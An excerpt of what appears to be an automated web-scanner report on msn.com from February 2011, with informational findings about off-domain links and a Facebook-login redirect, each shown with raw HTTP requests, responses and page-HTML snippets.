...[SNIP]...
<li><a href="https://careers.microsoft.com/">Jobs</a>
...[SNIP]...
<li><a class="opennew" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...

17.295. http://www.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msn.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.msn.com/?euid=AD04D6F8B2FF44629973BD0674351135&userGroup=W:default&PM=z:1

The response contains the following links to other domains:

http://advertising.microsoft.com/home/home
http://col.stb.s-msn.com/i/1C/CDD813DEFC7A67AE69FA70FF2A4AF8.jpg
http://col.stb.s-msn.com/i/2E/A9774ABCDDA67B3832C54D3706F.jpg
http://col.stb.s-msn.com/i/2F/C8F9CD20622DE6A86F55518CE1D.jpg
http://col.stb.s-msn.com/i/46/C04DC4968E465F8E43CED40636CA5.jpg
http://col.stb.s-msn.com/i/4D/C4EF1CB2FD60BEA02BFDE65C80C19.jpg
http://col.stb.s-msn.com/i/54/B2FA1AC044819CC604FA4A753187.jpg
http://col.stb.s-msn.com/i/56/79BE7F58343B7389C6169F61B75B3.jpg
http://col.stb.s-msn.com/i/6B/B68558D66CEC23C474D7825C5C2.jpg
http://col.stb.s-msn.com/i/72/C816212ADC799C7F8EC7FDE57D4ADE.jpg
http://col.stb.s-msn.com/i/80/317CAE83B4F2B27239FDF744FA97.jpg
http://col.stb.s-msn.com/i/87/DABA40A771D6B2BB3142D56BB88A7.jpg
http://col.stb.s-msn.com/i/88/5517876FB64CAC6C3EBE42148940.jpg
http://col.stb.s-msn.com/i/8D/EFF6DE51448719BE5CB3F355175D9.jpg
http://col.stb.s-msn.com/i/94/7B746415328DA99CE56E7B63468CA9.jpg
http://col.stb.s-msn.com/i/AB/E4A476B03136629235AEE24464117.jpg
http://col.stb.s-msn.com/i/BA/E4976F7F05EF39B12E414462740A5.jpg
http://col.stb.s-msn.com/i/C7/543C37C60A136C2AA5E2C40DE5F9C.jpg
http://col.stb.s-msn.com/i/D1/321F8F3D54FA762A4253B5DED39B1F.jpg
http://col.stb.s-msn.com/i/DC/19A9FEB8DFF3681F6A1457DC1870.jpg
http://col.stb.s-msn.com/i/EF/8F8EEBC6DC36B123AAA015E1BC06.jpg
http://col.stb.s-msn.com/i/FB/0DC22966C5E8C692CC22EAD214.jpg
http://col.stc.s-msn.com/br/sc/i/icons/adchoices_gif.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://msn.careerbuilder.com/Article/MSN-1223-Workplace-Issues-Eight-Sticky-Boss-Situations-and-How-to-Handle-Them/?SiteId=cbmsnjm41223&sc_extcmp=JS_1223_jobmod
http://msn.careerbuilder.com/Article/MSN-1462-Flexwork-Freelance-and-PT-Tips-for-Working-Multiple-Jobs/?SiteId=cbmsnjm41462&sc_extcmp=JS_1462_jobmod
http://msn.careerbuilder.com/Article/MSN-1516-Workplace-Issues-10-Ways-to-Sabotage-Your-Own-Career/?SiteId=cbmsnjm41516&sc_extcmp=JS_1516_jobmod
http://msn.careerbuilder.com/Article/MSN-2485-Workplace-Issues-Pros-and-cons-of-working-for-your-familys-business/?SiteId=cbmsnjm42485&sc_extcmp=JS_2485_jobmod
http://msn.careerbuilder.com/Article/MSN-2488-Leadership-Management-Say-this-not-that-5-ways-to-give-feedback-that-gets-results/?SiteId=cbmsnjm42488&sc_extcmp=JS_2488_jobmod
http://msn.foxsports.com/collegefootball/lists/scout-top-25-team-recruit-rankings
http://msn.foxsports.com/golf/story/Tiger-Woods-Dubai-golf-course-construction-halted-013111
http://msn.foxsports.com/mlb/story/New-York-Yankees-sign-RHP-Freddy-Garcia-to-minor-league-deal-013111
http://msn.foxsports.com/nba/page/heat-or-threepeat
http://msn.foxsports.com/nba/story/Miami-Heat-LeBron-James-hand-Cleveland-Cavaliers-21st-straight-loss-013111
http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Goats?GT1=39002
http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Heroes?GT1=39002
http://msn.foxsports.com/nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111
http://msn.foxsports.com/nfl/story/Troy-Polamalu-beats-Clay-Matthews-for-top-defensive-player-award-013111
http://msn.foxsports.com/nfl/story/pittsburgh-steelers-know-way-around-super-bowl-xlv-media-circus-013111
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://recruiting.scout.com/a.z?s=73&p=9&c=4&pid=88&yr=2011
http://static.foxsports.com/content/fscom/img/2011/02/01/AP110123058536_20110201011622347_116_175.JPG
http://www.bing.com/maps/explore/?org=aj&FORM=Z9LH9
http://www.bing.com/search?q=February+1&mkt=en-us&FORM=MSNHPT
http://www.bing.com/search?q=Man+arrested+250+times&form=msnhed&GT1=36010
http://www.bing.com/search?q=Monk+smoking+law&go=&form=msnhed&GT1=36010
http://www.bing.com/search?q=breast+implants+linked+to+rare+cancer&form=msnhed&GT1=36010
http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&form=ap&gt1=36010
http://www.bing.com/search?q=how+to+live+on+a+tight+budget&form=ap&gt1=36010
http://www.bing.com/search?q=ideas+for+decorating+office+cubicles&form=msnhed&GT1=36010
http://www.bing.com/search?q=job+interview+makeup&form=ap&gt1=36010
http://www.bing.com/search?q=prom+dresses+2011&form=msnhed&GT1=36010
http://www.bing.com/travel/content/search?q=Indoor+Water+Parks%3a+Wilderness+Territory+Waterpark+Resort&cid=msntab1176403&FORM=TRVCON
http://www.bing.com/travel/content/search?q=Resolution%3a+Learn+a+new+sport&cid=msntab1175092&form=TRVCON
http://www.bing.com/travel/content/search?q=San+Francisco's+Chinatown+Feeds+the+Senses&cid=msntab1176852&form=TRVCON
http://www.bing.com/travel/content/search?q=Unusual+Beaches%3a+Boulders+Beach%2c+Cape+Peninsula%2c+South+Africa&cid=msn1176225&FORM=TRVCON
http://www.bing.com/travel/content/search?q=World's+Cheapest+Destinations%3a+India&cid=msntab1138076&form=TRVCON
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&form=trvcon
http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do?cid=msn_tab&form=trvcon
http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643?qpvt=orlando+hotels&q=orlando+hotels&cid=msn_tab&form=trvcon
http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon
http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp
http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k?from=en-us_msnhp
http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698
http://www.theroot.com/multimedia/50-years-black-history?gt1=38002
http://www.theroot.com/views/2011/young-futurists?gt1=38002
http://www.theroot.com/views/meet-25-people-who-will-change-our-world?gt1=38002
http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers
https://careers.microsoft.com/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:55 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA04
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 44356
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><d
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=February+1&mkt=en-us&FORM=MSNHPT">Tuesday, February 1, 2011</a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/id/41363935/ns/world_news-mideastn_africa/?GT1=43001"><img src="http://col.stb.s-msn.com/i/8D/EFF6DE51448719BE5CB3F355175D9.jpg" title="Image: A protester shouts during an anti-government rally Tuesday in Cairo (.. Suhaib Salem/Reuters)" width="293" height="144" alt="Image: A protester shouts during an anti-government rally Tuesday in Cairo (.. Suhaib Salem/Reuters)" /></a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/id/41365053/ns/weather/?GT1=43001"><img src="http://col.stb.s-msn.com/i/72/C816212ADC799C7F8EC7FDE57D4ADE.jpg" title="Image: Satellite image of a winter storm moving across the Midwest (.. NOAA via Getty Images)" width="293" height="144" alt="Image: Satellite image of a winter storm moving across the Midwest (.. NOAA via Getty Images)" /></a>
...[SNIP]...
<div><a href="http://www.theroot.com/views/2011/young-futurists?gt1=38002"><img src="http://col.stb.s-msn.com/i/DC/19A9FEB8DFF3681F6A1457DC1870.jpg" title="Image: (Clockwise from top left) Zora Howard, Brandon Ford, Tiffany Dinkins, Tevyn Cole, Andrea Pugh, Cameron Fields, Gabrielle McBay & Clayton Penrose-Whitmore (Courtesy of The Root) " width="303" height="211" alt="Image: (Clockwise from top left) Zora Howard, Brandon Ford, Tiffany Dinkins, Tevyn Cole, Andrea Pugh, Cameron Fields, Gabrielle McBay & Clayton Penrose-Whitmore (Courtesy of The Root) " /></a>
...[SNIP]...
<span><a href="http://www.theroot.com/views/2011/young-futurists?gt1=38002">The Root: 25 Rising Stars We're Watching </a>
...[SNIP]...
<li><a href="http://www.theroot.com/views/meet-25-people-who-will-change-our-world?gt1=38002">The Root: 25 people who will change the world </a>
...[SNIP]...
<li class="last"><a href="http://www.theroot.com/multimedia/50-years-black-history?gt1=38002">50 years of black history in America </a>
...[SNIP]...
<a href="http://tv.msn.com/last-night-on-tv/?from=en-us_msnhp&Gt1=28150"><img src="http://col.stb.s-msn.com/i/D1/321F8F3D54FA762A4253B5DED39B1F.jpg" title="Image: Video still of Brad Womack on 'The Bachelor' (.. ABC)" width="303" height="211" alt="Image: Video still of Brad Womack on 'The Bachelor' (.. ABC)" /></a>
...[SNIP]...
<span><a href="http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Heroes?GT1=39002">Best & Worst Players in Super Bowl History </a>
...[SNIP]...
<li style="width:293px;" class="first"><a href="http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Heroes?GT1=39002"><img src="http://col.stb.s-msn.com/i/2E/A9774ABCDDA67B3832C54D3706F.jpg" title="Marcus Allen of the Los Angeles Raiders carries the ball during Super Bowl XVIII (.. Ronald C. Modra/Sports Imagery/Getty Images)" width="293" height="144" alt="Marcus Allen of the Los Angeles Raiders carries the ball during Super Bowl XVIII (.. Ronald C. Modra/Sports Imagery/Getty Images)" /></a><a href="http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Heroes?GT1=39002">10 best performances in the big game </a>
...[SNIP]...
<li style="width:293px;" class="last"><a href="http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Goats?GT1=39002"><img src="http://col.stb.s-msn.com/i/94/7B746415328DA99CE56E7B63468CA9.jpg" title="Image: Kerry Collins of the New York Giants fumbles in Super Bowl XXXV (.. Jeff Haynes/Getty Images)" width="293" height="144" alt="Image: Kerry Collins of the New York Giants fumbles in Super Bowl XXXV (.. Jeff Haynes/Getty Images)" /></a><a href="http://msn.foxsports.com/nfl/lists/Top_10_Super_Bowl_Goats?GT1=39002">10 players who should have stayed home </a>
...[SNIP]...
<a href="http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx?cp-documentid=26869207&gt1=32002"><img src="http://col.stb.s-msn.com/i/1C/CDD813DEFC7A67AE69FA70FF2A4AF8.jpg" title="Image: (From left) Oscar de la Renta & Vera Wang bridal gowns (Photos courtesy of Marie Claire)" width="293" height="144" alt="Image: (From left) Oscar de la Renta & Vera Wang bridal gowns (Photos courtesy of Marie Claire)" /></a>
...[SNIP]...
<a href="http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx?cp-documentid=27017419&gt1=32002"><img src="http://col.stb.s-msn.com/i/EF/8F8EEBC6DC36B123AAA015E1BC06.jpg" title=" Image: (From left) Tadashi Shoji & The Victoria bridal gowns (Photos courtesy of Glamour) " width="293" height="144" alt=" Image: (From left) Tadashi Shoji & The Victoria bridal gowns (Photos courtesy of Glamour) " /></a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/id/41364449/ns/world_news-the_new_york_times"><img class="portrait" src="http://col.stb.s-msn.com/i/FB/0DC22966C5E8C692CC22EAD214.jpg" title="" width="116" height="175" alt="Mohamed ElBaradei addresses a crowd in Cairo (AP)" /></a>
...[SNIP]...
<a href="http://money.msn.com/identity-theft/default-dyn.aspx?cp-documentid=6782540&GT1=33001"><img class="landscape" src="http://col.stb.s-msn.com/i/80/317CAE83B4F2B27239FDF744FA97.jpg" title="Image: Man looking up from behind laptop computer (.. Monalyn Gracia/Corbis)" width="303" height="117" alt="Image: Man looking up from behind laptop computer (.. Monalyn Gracia/Corbis)" /></a>
...[SNIP]...
<a href="http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx?cp-documentid=20523319&gt1=32033"><img class="portrait" src="http://col.stb.s-msn.com/i/4D/C4EF1CB2FD60BEA02BFDE65C80C19.jpg" title="Image: Kids playing bocce ball (.. Tara Donne/Real Simple) " width="116" height="175" alt="Image: Kids playing bocce ball (.. Tara Donne/Real Simple) " /></a>
...[SNIP]...
<a href="http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26798708&gt1=32002"><img class="landscape" src="http://col.stb.s-msn.com/i/46/C04DC4968E465F8E43CED40636CA5.jpg" title="Image: Loafer platform & buckled briefcase (Photos .. Lucky Digital Studio)" width="128" height="73" alt="Image: Loafer platform & buckled briefcase (Photos .. Lucky Digital Studio)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=prom+dresses+2011&form=msnhed&GT1=36010">Bing: Prom dress trends for spring 2011</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=ideas+for+decorating+office+cubicles&form=msnhed&GT1=36010">Bing: Ideas for decorating your office cubicle</a>
...[SNIP]...
<div style="float:right;width:116px"><a href="http://msn.foxsports.com/nfl/story/pittsburgh-steelers-know-way-around-super-bowl-xlv-media-circus-013111"><img class="portrait" src="http://static.foxsports.com/content/fscom/img/2011/02/01/AP110123058536_20110201011622347_116_175.JPG" width="116" height="175" alt="Image: QB Ben Roethlisberger of the Pittsburgh Steelers (Gene J. Puskar/Associated Press)" /></a></div><div style="margin-right:116px; padding-right: 10px;"><a href="http://msn.foxsports.com/nfl/story/pittsburgh-steelers-know-way-around-super-bowl-xlv-media-circus-013111">Steelers hold edge in one key category</a>
...[SNIP]...
<li class="ter"><a href="http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698">One-legged wrestler inspires with rousing success</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/golf/story/Tiger-Woods-Dubai-golf-course-construction-halted-013111">Tiger Woods' latest business venture hits the skids</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/Troy-Polamalu-beats-Clay-Matthews-for-top-defensive-player-award-013111">Which Super Bowl player won top defensive honor?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/page/heat-or-threepeat">LeBron vindicates his 'Decision'</a><span class="piped"> | <a href="http://msn.foxsports.com/nba/story/Miami-Heat-LeBron-James-hand-Cleveland-Cavaliers-21st-straight-loss-013111">Heat pound Cavs</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/New-York-Jets-assisant-Sal-Alosi-resigns-after-caught-tripping-opposing-player-013111">Jets assistant coach caught tripping player resigns</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/mlb/story/New-York-Yankees-sign-RHP-Freddy-Garcia-to-minor-league-deal-013111">Source: Yanks add another former All-Star pitcher</a>
...[SNIP]...
<li class="ter"><a href="http://recruiting.scout.com/a.z?s=73&p=9&c=4&pid=88&yr=2011">Star college football recruit going to ...</a><span class="piped"> | <a href="http://msn.foxsports.com/collegefootball/lists/scout-top-25-team-recruit-rankings">Top teams</a>
...[SNIP]...
<a href="http://health.msn.com/health-topics/quit-smoking/articlepage.aspx?cp-documentid=100269246&gt1=31020"><img class="landscape" src="http://col.stb.s-msn.com/i/54/B2FA1AC044819CC604FA4A753187.jpg" title="Image: Woman holding a cigarette (.. Caroline Purser/Getty Images)" width="303" height="117" alt="Image: Woman holding a cigarette (.. Caroline Purser/Getty Images) " /></a>
...[SNIP]...
<a href="http://fitbie.msn.com/lose-weight/tips/reasons-youre-destined-weight-loss-success?gt1=50002"><img class="landscape" src="http://col.stb.s-msn.com/i/88/5517876FB64CAC6C3EBE42148940.jpg" title="Image: Woman using an exercise ball (.. altrendo images/Getty Images)" width="128" height="73" alt="Image: Woman using an exercise ball (.. altrendo images/Getty Images)" /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/search?q=breast+implants+linked+to+rare+cancer&form=msnhed&GT1=36010"><img class="landscape" src="http://col.stb.s-msn.com/i/56/79BE7F58343B7389C6169F61B75B3.jpg" title="Image: Doctor holding a breast implant (.. Keith Brofsky/Getty Images)" width="128" height="73" alt="Image: Doctor holding a breast implant (.. Keith Brofsky/Getty Images)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/search?q=breast+implants+linked+to+rare+cancer&form=msnhed&GT1=36010"><strong>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=breast+implants+linked+to+rare+cancer&form=msnhed&GT1=36010">Search for more</a>
...[SNIP]...
<a href="http://technolog.msnbc.msn.com/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink/from/toolbar?GT1=43001"><img class="portrait" src="http://col.stb.s-msn.com/i/C7/543C37C60A136C2AA5E2C40DE5F9C.jpg" title="Image: Dr. Zoe D Katze with her credentials (.. Dr. Steve Eichel/Courtesy of MSNBC)" width="116" height="175" alt="Image: Dr. Zoe D Katze with her credentials (.. Dr. Steve Eichel/Courtesy of MSNBC)" /></a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/id/41299984/ns/health-cancer/from/toolbar?GT1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/BA/E4976F7F05EF39B12E414462740A5.jpg" title="Image: Doctor consulting with patient (.. Tetra Images/Getty Images)" width="128" height="73" alt="Image: Doctor consulting with patient (.. Tetra Images/Getty Images)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=Monk+smoking+law&go=&form=msnhed&GT1=36010">Bing: Monk facing jail for having tobacco</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=Man+arrested+250+times&form=msnhed&GT1=36010">Find: Man arrested more than 250 times</a>
...[SNIP]...
<a href="http://movies.msn.com/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/"><img class="landscape" src="http://col.stb.s-msn.com/i/AB/E4A476B03136629235AEE24464117.jpg" title="Image: Henry Cavill at Tribeca in 2009 (.. AP)" width="128" height="73" alt="Image: Henry Cavill at Tribeca in 2009 (.. AP)" /></a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k?from=en-us_msnhp">Watch an exclusive clip from 'The Roommate'</a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp">Watch the first two minutes of 'Rio'</a>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://msn.careerbuilder.com/Article/MSN-2485-Workplace-Issues-Pros-and-cons-of-working-for-your-familys-business/?SiteId=cbmsnjm42485&sc_extcmp=JS_2485_jobmod"><img class="landscape" src="http://col.stb.s-msn.com/i/87/DABA40A771D6B2BB3142D56BB88A7.jpg" title="Image: Workers planting at garden center (.. Henglein and Steets/Getty Images)" width="128" height="73" alt="Image: Workers planting at garden center (.. Henglein and Steets/Getty Images)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://msn.careerbuilder.com/Article/MSN-2485-Workplace-Issues-Pros-and-cons-of-working-for-your-familys-business/?SiteId=cbmsnjm42485&sc_extcmp=JS_2485_jobmod"><strong>
...[SNIP]...
<p>The <a href="http://msn.careerbuilder.com/Article/MSN-2485-Workplace-Issues-Pros-and-cons-of-working-for-your-familys-business/?SiteId=cbmsnjm42485&sc_extcmp=JS_2485_jobmod">pros and cons</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1462-Flexwork-Freelance-and-PT-Tips-for-Working-Multiple-Jobs/?SiteId=cbmsnjm41462&sc_extcmp=JS_1462_jobmod">Tips for working multiple jobs</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2488-Leadership-Management-Say-this-not-that-5-ways-to-give-feedback-that-gets-results/?SiteId=cbmsnjm42488&sc_extcmp=JS_2488_jobmod">5 tips for feedback </a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1223-Workplace-Issues-Eight-Sticky-Boss-Situations-and-How-to-Handle-Them/?SiteId=cbmsnjm41223&sc_extcmp=JS_1223_jobmod">8 sticky boss situations</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1516-Workplace-Issues-10-Ways-to-Sabotage-Your-Own-Career/?SiteId=cbmsnjm41516&sc_extcmp=JS_1516_jobmod">10 ways to sabotage your career</a>
...[SNIP]...
<li class="ter"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers">Are you ready for video interviews? </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=job+interview+makeup&form=ap&gt1=36010">Bing: Got an interview? Get makeup tips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+live+on+a+tight+budget&form=ap&gt1=36010">Search: How to live on a tight budget</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&form=ap&gt1=36010">Find: How to get your dream job</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Indoor+Water+Parks%3a+Wilderness+Territory+Waterpark+Resort&cid=msntab1176403&FORM=TRVCON"><img class="landscape" src="http://col.stb.s-msn.com/i/2F/C8F9CD20622DE6A86F55518CE1D.jpg" title="Image: Kalahari Resort indoor water park, Sandusky, Ohio (Courtesy of Kalahari Resort/via Budget Travel)" width="128" height="73" alt="Image: Kalahari Resort indoor water park, Sandusky, Ohio (Courtesy of Kalahari Resort/via Budget Travel)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Indoor+Water+Parks%3a+Wilderness+Territory+Waterpark+Resort&cid=msntab1176403&FORM=TRVCON"><strong>
...[SNIP]...
<p>Cold outside? <a href="http://www.bing.com/travel/content/search?q=Indoor+Water+Parks%3a+Wilderness+Territory+Waterpark+Resort&cid=msntab1176403&FORM=TRVCON">Grab your swimsuit</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=World's+Cheapest+Destinations%3a+India&cid=msntab1138076&form=TRVCON">15 of the world's cheapest travel destinations</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Unusual+Beaches%3a+Boulders+Beach%2c+Cape+Peninsula%2c+South+Africa&cid=msn1176225&FORM=TRVCON">Strange & breathtaking beaches around the globe</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=San+Francisco's+Chinatown+Feeds+the+Senses&cid=msntab1176852&form=TRVCON">Get a real taste of San Francisco's Chinatown</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Resolution%3a+Learn+a+new+sport&cid=msntab1175092&form=TRVCON">Turn your New Year's resolution into a vacation</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&form=trvcon">Find great deals for your 2011 travels</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643?qpvt=orlando+hotels&q=orlando+hotels&cid=msn_tab&form=trvcon">Orlando hotel deals</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do?cid=msn_tab&form=trvcon">Cheap flights to Las Vegas</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon">Begin your hotel search with Bing</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/maps/explore/?org=aj&FORM=Z9LH9#">Bing Maps: Discover a new destination</a>
...[SNIP]...
<a href="http://businessonmain.msn.com/videos/coolrunnings.aspx?cp-documentid=26925865&source=msneditorial&gt1=25049"><img src="http://col.stb.s-msn.com/i/6B/B68558D66CEC23C474D7825C5C2.jpg" title="Image: Video still of Naked Pizza's Facebook page (.. Microsoft)" width="75" height="128" alt="Image: Video still of Naked Pizza's Facebook page (.. Microsoft)" /></a>
...[SNIP]...
<a href="http://g.msn.com/AIPRIV/en-us" class="adch"><img src="http://col.stc.s-msn.com/br/sc/i/icons/adchoices_gif.gif" alt="Ad Choice" title="Ad Choice" height="12" width="68" /></a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise</a>
...[SNIP]...
<li><a href="https://careers.microsoft.com/">Jobs</a>
...[SNIP]...
<li><a class="opennew" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...

17.296. http://www.msn.com/scp/AuthServiceFacebook.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msn.com
Path:	/scp/AuthServiceFacebook.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.msn.com/scp/AuthServiceFacebook.aspx?redirectTo=0&mkt=en-us&format=Homepage

The response contains the following link to another domain:

http://en-us.facebook.com/login.php?api_key=8f8fa7ab966b3be82807212858019588&display=popup&extern=1&fbconnect=true&return_session=1&req_perms=read_stream,user_status&v=1.0&next=http%3a%2f%2fwww.msn.com%2fscp%2fAuthServiceFacebook.aspx%3fredirectTo%3d8%26mkt%3den-US%26format%3dHomepage%26unifiedSignIn%3dFalse%26SPSAdapterAlias%3d%26WLProductID%3d&cancel_url=http%3a%2f%2fwww.msn.com%2fscp%2fAuthServiceFacebook.aspx%3fredirectTo%3d7%26mkt%3den-US%26format%3dHomepage%26unifiedSignIn%3dFalse%26SPSAdapterAlias%3d%26WLProductID%3d

Request

GET /scp/AuthServiceFacebook.aspx?redirectTo=0&mkt=en-us&format=Homepage HTTP/1.1
Host: www.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 16:03:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA39
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://en-us.facebook.com/login.php?api_key=8f8fa7ab966b3be82807212858019588&display=popup&extern=1&fbconnect=true&return_session=1&req_perms=read_stream,user_status&v=1.0&next=http%3a%2f%2fwww.msn.com%2fscp%2fAuthServiceFacebook.aspx%3fredirectTo%3d8%26mkt%3den-US%26format%3dHomepage%26unifiedSignIn%3dFalse%26SPSAdapterAlias%3d%26WLProductID%3d&cancel_url=http%3a%2f%2fwww.msn.com%2fscp%2fAuthServiceFacebook.aspx%3fredirectTo%3d7%26mkt%3den-US%26format%3dHomepage%26unifiedSignIn%3dFalse%26SPSAdapterAlias%3d%26WLProductID%3d
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 678

<html><head><title>Object moved</title></head><body>
